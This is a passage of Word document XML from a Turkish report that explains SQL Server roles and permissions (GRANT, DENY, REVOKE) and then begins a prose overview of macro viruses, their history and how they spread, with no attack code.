          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SQL Server, üç tür rolü destekler: sunucu, veritabanı ve uygulama.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sunucu rolleri girişlerle aynı kapsamı paylaşır; bu, sunucu düzeyinde çalıştıkları ve bir bütün olarak veritabanı motoruna ait oldukları anlamına gelir. Sonuç olarak, rollere yalnızca sunucu düzeyinde ilkeler ekleyebilir ve rolleri izinleri olan izinlerle veritabanı düzeyinde güvence altına alınabilecek şekilde yapılandırabililiz.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70815" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SQL Server, her biri değiştirilemeyecek izinlerle önceden yapılandırılmış bir dizi sabit sunucu rolü sağlar. Sabit roller, bu rollere atanan yöneticilerin belirli görevleri yerine getirmelerine izin verir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F70815">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Örneğin, sysadmin sabit sunucu rolünün üyeleri, sunucu üzerinde herhangi bir eylem gerçekleştirebilir, ancak serveradmin rolünün üyeleri yalnızca sunucu genelindeki yapılandırma seçeneklerini değiştirebilir ve sunucuyu kapatabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Sabit sunucu rollerinin listesini görüntülemek için , aşağıdaki örnekte gösterildiği gibi sp_helpsrvrole system komutunu çalıştırabiliriz.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47D49491" wp14:editId="41545C90">
            <wp:extent cx="5760720" cy="395605"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="32" name="Resim 3">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F65E38A5-84A0-4CF2-A61C-73E4D2B4104B}"/>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65E38A5-84A0-4CF2-A61C-73E4D2B4104B}"/>
                        </a:ext>
                      </a:extLst>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="395605"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Bir sunucu rolü oluşturmak, başka bir ilke türü oluşturmak kadar kolaydır. Örneğin , aşağıdaki örnekte gösterildiği gibi, rol adından başka bir şey belirtmeyen bir CREATE SERVER ROLE ifadesi tanımlayabiliriz.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C6FCAA4" wp14:editId="47BDD69C">
            <wp:extent cx="5760720" cy="428625"/>
            <wp:effectExtent l="0" t="0" r="5080" b="3175"/>
            <wp:docPr id="33" name="Resim 4">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F698A375-D0ED-4860-8F8F-3111BCFF32F6}"/>
                </a:ext>
              </a:extLst>
            </wp:docPr>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698A375-D0ED-4860-8F8F-3111BCFF32F6}"/>
                        </a:ext>
                      </a:extLst>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="428625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Bu durumda, SrvRole1 bir sunucu rolü adı yaratıyoruz . Ancak, rol yalnızca SQL Server örneğinde sunucu düzeyinde bir nesne olarak, hiçbir izni olmadan var olur. Buradan, role dahil etmek istediğimiz oturum açma ilkelerini eklemeli ve sonunda rolü gerekli izinlerle yapılandırmalıyız.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SrvRole1 sunucu rolüne bir ilke eklemek için , aşağıdaki örnekte gösterildiği gibi ALTER SERVER ROLE deyimini kullanabiliriz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58DF0120" wp14:editId="7E3B1C63">
            <wp:extent cx="5760720" cy="385445"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="34" name="Resim 5">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EC78F37-3BDA-41FC-A6FB-EA0D2156961F}"/>
                </a:ext>
              </a:extLst>
            </wp:docPr>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5EC78F37-3BDA-41FC-A6FB-EA0D2156961F}"/>
                        </a:ext>
                      </a:extLst>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="385445"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Veritabanı rolü oluşturmak, sunucu rolü oluşturmak kadar kolaydır. Daha önce olduğu gibi, SSMS kullanabilir veya bir T-SQL ifadesi yayınlayabiliriz, bu durumda CREATE ROLE ifadesi örneğin, aşağıdaki örnek DbRole1 veritabanı rolü oluşturur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CBCF428" wp14:editId="37EF757A">
            <wp:extent cx="5760720" cy="467995"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1905"/>
            <wp:docPr id="35" name="Resim 6">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69EA1BF2-8F35-4810-9AAC-3A6BFED7E599}"/>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69EA1BF2-8F35-4810-9AAC-3A6BFED7E599}"/>
                        </a:ext>
                      </a:extLst>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="467995"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>DbRole1 veritabanı rolüne bir ilke eklemek için , aşağıdaki örnekte gösterildiği gibi ALTER ROLE deyimini kullanabiliriz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="787AA614" wp14:editId="14424887">
            <wp:extent cx="5760720" cy="514985"/>
            <wp:effectExtent l="0" t="0" r="5080" b="5715"/>
            <wp:docPr id="36" name="Resim 7">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5A784DB-83BB-45F0-BDAF-C66ABCD89E9C}"/>
                </a:ext>
              </a:extLst>
            </wp:docPr>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A5A784DB-83BB-45F0-BDAF-C66ABCD89E9C}"/>
                        </a:ext>
                      </a:extLst>
                    </pic:cNvPr>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="514985"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00581270" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581270">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>2.7 SQL Server İzinleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F9184E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>GRANT: Bir yöneticiye güvenli bir şekilde izinler verir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F9184E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>DENY: Bir yöneticiye güvenli bir şekilde izin verilmeyen izinleri reddeder. Bu önemli olabilir çünkü yöneticinin kendisine verilen diğer izinleri devralmasını engeller.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F9184E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>REVOKE: Bir yöneticiye güvenli bir şekilde önceden verilmiş veya reddedilen izinleri kaldırır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F9184E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Bu ifadelerin her biri, izin yapısının karmaşıklığının yanı sıra oldukça karmaşık bir sözdizimini de destekler.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F9184E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>DbUser1 veritabanı kullanıcısını içeren DbRole1 veritabanı rolüne uspUpdateEmployeeHireInfo saklı yordamına EXECUTE izni vermek için bir GRANT deyimi kullanalım</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GRANT EXECUTE ON OBJECT::HumanResources.uspUpdateEmployeeHireInfo TO DbRole1; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SQL Server kaynaklarına düzenleme erişimi zaman alır ve dikkatle değerlendirilir. Sistem ne kadar karmaşıksa, o kadar fazla iş içerir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00581270" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581270">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.Makro Virüsler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00581270" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581270">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>3.1 Makro Virüs Nedir ?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F9184E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Makro virüsler kendi kodlarını belgeler, elektronik tablolar ve diğer veri dosyalarıyla ilişkili makrolara ekler.</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 Concept adlı ilk makro virüsü Temmuz 1995'te ortaya çıktı ve ardından makro virüsleri (çoğunlukla Word belgelerine bulaşan) yeni yüzyılın başlangıcına kadar baskın virüs türü haline geldi.</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 O dönemde Microsoft, Office'te (Office 2000'den sonraki sürümler) makroları varsayılan olarak devre dışı bıraktı.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> O zamandan bu yana siber suçlular kendi virüslü makrolarının çalışması için kurbanları makroları etkinleştirmeleri için kandırmaya çalışmak zorunda kaldı.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DE50EE0" wp14:editId="67788B2D">
            <wp:extent cx="3016577" cy="2196445"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="37" name="Resim 3" descr="content/tr-tr/images/repository/isc/2017-images/virus-img-04.jpg">
              <a:extLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C57E9014-93A2-40FD-958B-FFA2FBF4C36D}"/>
                </a:ext>
              </a:extLst>
            </wp:docPr>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="4" name="Resim 3" descr="content/tr-tr/images/repository/isc/2017-images/virus-img-04.jpg">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C57E9014-93A2-40FD-958B-FFA2FBF4C36D}"/>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739" cy="2205300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00581270" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581270">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>3.2 Makro Virüsler Nasıl Yayılır ?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F9184E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Makro virüsleri sıklıkla belgelere yerleştirilmiş olarak bulunur veya kelime işleme programlarına kötü amaçlı kod şeklinde eklenir.</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 E-postalara eklenmiş belgelerden gelebilir veya kod, reklam şeritlerindeki veya URL'lerdeki "kimlik avı" bağlantıları tıklatıldıktan sonra indirilebilir. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F9184E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Virüs bulaşan bir makro çalıştırılıp bir dizi komut gerçekleştirdiği zamana kadar faaliyete geçmediklerinden algılanmaları zordur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F9184E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
